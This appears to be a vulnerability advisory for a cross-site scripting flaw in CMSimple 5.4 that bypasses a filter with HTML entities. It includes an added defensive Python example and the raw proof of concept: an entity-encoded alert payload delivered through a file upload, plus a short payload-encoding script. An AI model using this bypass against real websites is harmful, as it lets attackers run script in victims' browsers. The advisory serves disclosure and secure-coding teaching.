Vendor: CMSimple
By: heinjame
CVSS: 6.1 (MEDIUM)
Vulnerability type: Cross Site Scripting (XSS)
CWE: 79
Product Name: CMSimple
Affected Version From: <=5.4
Affected Version To: <=5.4
Patch Exists: YES
Related CWE:
CPE: a:cmsimple:cmsimple:5.4
Metasploit:
Other Scripts:
Platforms Tested: Linux os
Year: 2021

CMSimple 5.4 – Cross Site Scripting (XSS)

Because the application filters user input with preg_replace on the raw string, an attacker can bypass the restriction by encoding the payload as HTML numeric character references (HTML-entity encoding); the browser decodes these when it reads the value back, so the application lets an attacker perform DOM-based XSS.

Mitigation:

Upgrade to the latest version of CMSimple.
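The ordering problem the advisory describes (a character blocklist applied to the raw value, while the browser decodes numeric entities when it later reads the value out of an attribute) can be reproduced and checked in a few lines. The Python below is an added example written for this page; it is not CMSimple's code and not the advisory author's script. The blocklist pattern, the inline `del('...')` handler and the sample input are assumptions made for illustration; the sample input is the advisory's attack vector in its entity-encoded form, used here as constructed test data.

```python
import html
import json
import re

# Constructed sample input: the advisory's attack vector after HTML-entity
# encoding (its decoded form is ')-alert(1)//).
ENCODED_INPUT = "&#39;&#41;&#45;&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;&#47;&#47;"

# Assumed blocklist standing in for the preg_replace-style filter the
# advisory mentions. It strips characters that would break out of a
# single-quoted JavaScript string literal. This is an illustration, not
# CMSimple's actual filter.
BLOCKLIST = re.compile(r"""['"()/<>]""")


def blocklist_filter(value: str) -> str:
    """Vulnerable pattern: strip listed characters from the RAW string.

    Entity-encoded text contains none of the listed characters, so it
    passes through untouched.
    """
    return BLOCKLIST.sub("", value)


def canonicalize(value: str) -> str:
    """Decode HTML character references the way a browser decodes an attribute value."""
    return html.unescape(value)


def is_suspicious(value: str) -> bool:
    """Detection/validation done right: canonicalize first, then check.

    Returns True when the decoded form contains a blocklisted character,
    which is exactly the case the raw-string filter misses.
    """
    return BLOCKLIST.search(canonicalize(value)) is not None


def render_unsafe(filename: str) -> str:
    """Vulnerable rendering (assumed): filtered raw value dropped into an inline handler."""
    return f"<a onclick=\"del('{blocklist_filter(filename)}')\">delete</a>"


def render_safe(filename: str) -> str:
    """Hardened rendering: encode for the JS-string context, then for the HTML attribute.

    json.dumps produces a quoted JavaScript string literal with any quote,
    backslash or control character escaped; html.escape then protects the
    attribute delimiter. No blocklist is involved, so entity tricks have
    nothing to bypass: whatever the stored value is, it stays data.
    """
    js_literal = json.dumps(filename)
    return f'<a onclick="del({html.escape(js_literal)})">delete</a>'


def attribute_value_seen_by_browser(markup: str) -> str:
    """Pull out the onclick attribute and decode entities, as the HTML parser would.

    The result is the JavaScript source the browser would hand to its
    script engine when the link is clicked.
    """
    match = re.search(r'onclick="([^"]*)"', markup)
    return html.unescape(match.group(1)) if match else ""


if __name__ == "__main__":
    print("decoded input      :", canonicalize(ENCODED_INPUT))
    print("filter (raw)       :", blocklist_filter(ENCODED_INPUT))
    print("flagged after decode:", is_suspicious(ENCODED_INPUT))
    print("unsafe JS executed :", attribute_value_seen_by_browser(render_unsafe(ENCODED_INPUT)))
    print("safe JS executed   :", attribute_value_seen_by_browser(render_safe(ENCODED_INPUT)))
```

Running it shows the two halves of the bug: `blocklist_filter` returns the encoded input unchanged, yet the browser-side decode of the unsafe markup yields `del('')-alert(1)//')`, where the attacker-controlled text has left the string literal. `is_suspicious` catches the same input because it decodes before checking, and `render_safe` removes the blocklist entirely in favour of context-specific output encoding. A stricter design avoids inline event handlers altogether (store the filename in a data attribute and attach the handler with addEventListener), which also makes a Content Security Policy without `unsafe-inline` possible.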

Exploit-DB raw data:

# Exploit Title: CMSimple 5.4 - Cross Site Scripting (XSS)
# Date: 22/10/2021
# Exploit Author: heinjame
# Vendor Homepage: https://www.cmsimple.org/en/
# Software Link: https://www.cmsimple.org/en/?Downloads
# Version: <=5.4
# Tested on: Linux os

[Description]

Since the application is filtering user input with preg_replace, attackers are able to bypass the restriction by using HTML-to-Unicode encoding.

So the application lets an attacker perform DOM-based XSS.

[Payload and POC]

File > images > Upload a file

Attack vector: ')-alert(1)// (needs to be HTML-entity encoded):
&#39;&#41;&#45;&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;&#47;&#47;

When the victim clicks the delete button, an alert will be executed.

Script to encode the payload

# Read the raw payload from stdin and rewrite every character as its
# decimal HTML numeric character reference (&#NN;).
payload = input()
finalpayload = ""
for i in payload:
    finalpayload = finalpayload + "&#" + str(ord(i)) + ";"
print(finalpayload)